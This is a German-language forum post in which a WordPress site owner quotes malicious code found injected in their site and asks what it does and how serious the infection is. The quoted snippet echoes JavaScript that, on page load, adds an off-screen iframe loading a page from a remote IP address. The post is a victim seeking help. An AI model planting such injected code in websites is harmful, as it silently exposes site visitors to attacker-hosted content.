Ador
Erfahrenes Mitglied
Hallo,
leider wurde mein Wordpress infiziert:
Ich habe die betroffenen Datein bereits gesäubert und nun läuft die Seite wieder.
Aber wie schlimm ist das nun? was führt das das Script aus? Lässt sich irgendwie nachvollziehen was in dem Iframe ausgeführt wird?
leider wurde mein Wordpress infiziert:
Code:
#a7cc1f#
echo "<script type=\"text/javascript\">
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = \"http://198.106.81.146/novo/state.php\";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
</script>
";
#/a7cc1f#
Ich habe die betroffenen Datein bereits gesäubert und nun läuft die Seite wieder.
Aber wie schlimm ist das nun? was führt das das Script aus? Lässt sich irgendwie nachvollziehen was in dem Iframe ausgeführt wird?